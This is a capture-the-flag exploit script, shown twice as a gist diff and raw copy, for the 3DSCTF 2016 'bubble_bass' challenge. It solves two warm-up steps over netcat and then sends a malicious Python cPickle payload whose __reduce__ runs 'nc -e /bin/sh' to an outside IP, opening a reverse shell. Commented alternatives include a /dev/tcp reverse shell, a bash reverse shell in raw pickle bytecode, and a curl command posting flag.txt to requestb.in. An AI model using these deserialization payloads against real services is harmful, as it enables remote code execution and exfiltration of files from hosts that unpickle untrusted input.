intrd · March 3, 2017 08:40
diff --git a/cpickles_exploit.py b/cpickles_exploit.py
 #!/usr/bin/python
 ## Exploiting python cpickle - pwn300-bubble_bass @ 3dsctf-2k16
 # @author intrd - http://dann.com.br/
 # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

 # int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
 # int_caesar.py - https://gist.github.com/intrd/2c19d329885dfee9fc70c38910394a7d

 import re, sys, os, subprocess, cPickle
 sys.path.append("../../LIBS/")
 from int_netcat import Netcat
 from int_caesar import intCaesar

 nc = Netcat('34.197.58.21', 9997)

 data=nc.read_until(' =')
 print(data)
 number1=re.search(r'of (.*) \+', data).group(1)
 number2=re.search(r'\+ (.*) =', data).group(1)
 result1=(int(number1)+int(number2))
 print(result1)
 nc.write(str(result1) + '\n')
 data=nc.read()
 print(data)

 ## Use this to solve the first step (decrypt ciphered message)
 # msg="Toik! Znk Igkygx iovnkx, gryu qtuct gy g ynolz iovnkx, oy utk ul znk yosvrkyz luxsy ul ktixevzout. Tuc, utk rgyz wakyzout..."
 #  for x in range(0, 50):
 #      try:
 #          #print x
 #          print "shift: "+str(x)+" "+intCaesar(msg,x)
 #      except Exception as e:
 #          print e
 # sys.exit(0)
 # ..by visual inspection.. rot=20 = deciphered result in my case, it may changes..
 msg="PUT HERE THE DECIPHERED MESSAGE."
 nc.write(str(msg) + '\n')
 data=nc.read()
 print(data)

 class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))
 #payload = cPickle.dumps(RunBinSh()) #testing if server accept my command

 class GetShell(object):
    def __reduce__(self):
      #return (os.system, ('cat flag.txt',)) # nope, we are blind..
      #return (os.system, ('/bin/sh </dev/tcp/175.14.11.121/6888 >&0 2>&0',)) # this shellscript didn't workd..
      return (os.system, ('nc -e /bin/sh 175.14.11.121 6888',)) # w/ this we get a fully working reverse shell
      #return (os.system, ('curl -X POST -d "@./flag.txt" http://requestb.in/13f8pqd1',)) # just for note, the rev shell is not really needed here.. in this case the curl is installed and we know where the flag is.. just send flag.txt contet through curl using requestb.in
 payload = cPickle.dumps(GetShell())

 # me = "175.14.11.121"
 # payload = "cposix\nsystem\np0\n(S'/bin/bash -i &gt;&amp; /dev/tcp/%s/6888 0&gt;&amp;1'\np1\ntp2\nRp3\n." % me

 print payload

 nc.write(payload)
 data=nc.read()
 print(data)
	#!/usr/bin/python
	## Exploiting python cpickle - pwn300-bubble_bass @ 3dsctf-2k16
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
	# int_caesar.py - https://gist.github.com/intrd/2c19d329885dfee9fc70c38910394a7d

	import re, sys, os, subprocess, cPickle
	sys.path.append("../../LIBS/")
	from int_netcat import Netcat
	from int_caesar import intCaesar

	nc = Netcat('34.197.58.21', 9997)

	data=nc.read_until(' =')
	print(data)
	number1=re.search(r'of (.*) \+', data).group(1)
	number2=re.search(r'\+ (.*) =', data).group(1)
	result1=(int(number1)+int(number2))
	print(result1)
	nc.write(str(result1) + '\n')
	data=nc.read()
	print(data)

	## Use this to solve the first step (decrypt ciphered message)
	# msg="Toik! Znk Igkygx iovnkx, gryu qtuct gy g ynolz iovnkx, oy utk ul znk yosvrkyz luxsy ul ktixevzout. Tuc, utk rgyz wakyzout..."
	# for x in range(0, 50):
	# try:
	# #print x
	# print "shift: "+str(x)+" "+intCaesar(msg,x)
	# except Exception as e:
	# print e
	# sys.exit(0)
	# ..by visual inspection.. rot=20 = deciphered result in my case, it may changes..
	msg="PUT HERE THE DECIPHERED MESSAGE."
	nc.write(str(msg) + '\n')
	data=nc.read()
	print(data)

	class RunBinSh(object):
	def __reduce__(self):
	return (subprocess.Popen, (('/bin/sh',),))
	#payload = cPickle.dumps(RunBinSh()) #testing if server accept my command

	class GetShell(object):
	def __reduce__(self):
	#return (os.system, ('cat flag.txt',)) # nope, we are blind..
	#return (os.system, ('/bin/sh </dev/tcp/175.14.11.121/6888 >&0 2>&0',)) # this shellscript didn't workd..
	return (os.system, ('nc -e /bin/sh 175.14.11.121 6888',)) # w/ this we get a fully working reverse shell
	#return (os.system, ('curl -X POST -d "@./flag.txt" http://requestb.in/13f8pqd1',)) # just for note, the rev shell is not really needed here.. in this case the curl is installed and we know where the flag is.. just send flag.txt contet through curl using requestb.in
	payload = cPickle.dumps(GetShell())

	# me = "175.14.11.121"
	# payload = "cposix\nsystem\np0\n(S'/bin/bash -i >& /dev/tcp/%s/6888 0>&1'\np1\ntp2\nRp3\n." % me

	print payload

	nc.write(payload)
	data=nc.read()
	print(data)
No results found